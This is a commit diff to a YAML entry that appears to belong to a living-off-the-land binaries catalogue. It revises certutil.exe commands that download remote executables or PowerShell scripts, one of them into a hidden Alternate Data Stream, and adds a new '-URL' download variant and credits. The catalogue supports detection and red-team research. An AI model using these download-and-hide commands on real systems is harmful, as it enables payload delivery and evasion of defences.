Update Certutil.yml with new flag and update previous flag

yml/OSBinaries/Certutil.yml

@@ -4,27 +4,36 @@ Description: Windows binary used for handling certificates
 Author: Oddvar Moe
 Created: 2018-05-25
 Commands:
-  - Command: certutil.exe -urlcache -split -f {REMOTEURL:.exe} {PATH:.exe}
-    Description: Download and save executable to disk in the current folder.
+  - Command: certutil.exe -urlcache -f {REMOTEURL:.exe} {PATH:.exe}
+    Description: Download and save an executable to disk in the current folder.
     Usecase: Download file from Internet
     Category: Download
     Privileges: User
     MitreID: T1105
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
-  - Command: certutil.exe -verifyctl -f -split {REMOTEURL:.exe} {PATH:.exe}
-    Description: Download and save executable to disk in the current folder.
+  - Command: certutil.exe -verifyctl -f {REMOTEURL:.exe} {PATH:.exe}
+    Description: Download and save an executable to disk in the current folder when a file path is specified, or %LOCALAPPDATA%low\Microsoft\CryptnetUrlCache\Content\[hash] when not.
     Usecase: Download file from Internet
     Category: Download
     Privileges: User
     MitreID: T1105
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
-  - Command: certutil.exe -urlcache -split -f {REMOTEURL:.ps1} {PATH_ABSOLUTE}:ttt
-    Description: Download and save a PS1 file to an Alternate Data Stream (ADS).
+  - Command: certutil.exe -urlcache -f {REMOTEURL:.ps1} {PATH_ABSOLUTE}:ttt
+    Description: Download and save a .ps1 file to an Alternate Data Stream (ADS).
     Usecase: Download file from Internet and save it in an NTFS Alternate Data Stream
     Category: ADS
     Privileges: User
     MitreID: T1564.004
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
+  - Command: certutil.exe -URL {REMOTEURL:.exe}
+    Description: Download and save an executable to %LOCALAPPDATA%low\Microsoft\CryptnetUrlCache\Content\[hash].
+    Usecase: Download file from Internet
+    Category: Download
+    Privileges: User
+    MitreID: T1105
+    OperatingSystem: Windows 10, Windows 11
+    Tags:
+      - Application: GUI
   - Command: certutil -encode {PATH} {PATH:.base64}
     Description: Command to encode a file using Base64
     Usecase: Encode files to evade defensive measures
@@ -65,6 +74,7 @@ Resources:
   - Link: https://twitter.com/Moriarty_Meng/status/984380793383370752
   - Link: https://twitter.com/mattifestation/status/620107926288515072
   - Link: https://twitter.com/egre55/status/1087685529016193025
+  - Link: https://www.hexacorn.com/blog/2020/08/23/certutil-one-more-gui-lolbin/
 Acknowledgement:
   - Person: Matt Graeber
     Handle: '@mattifestation'
@@ -73,3 +83,7 @@ Acknowledgement:
   - Person: egre55
     Handle: '@egre55'
   - Person: Lior Adar
+  - Person: Adam
+    Handle: '@hexacorn'
+  - Person: SomeTestLeper
+    Handle: '@SomeTestLeper'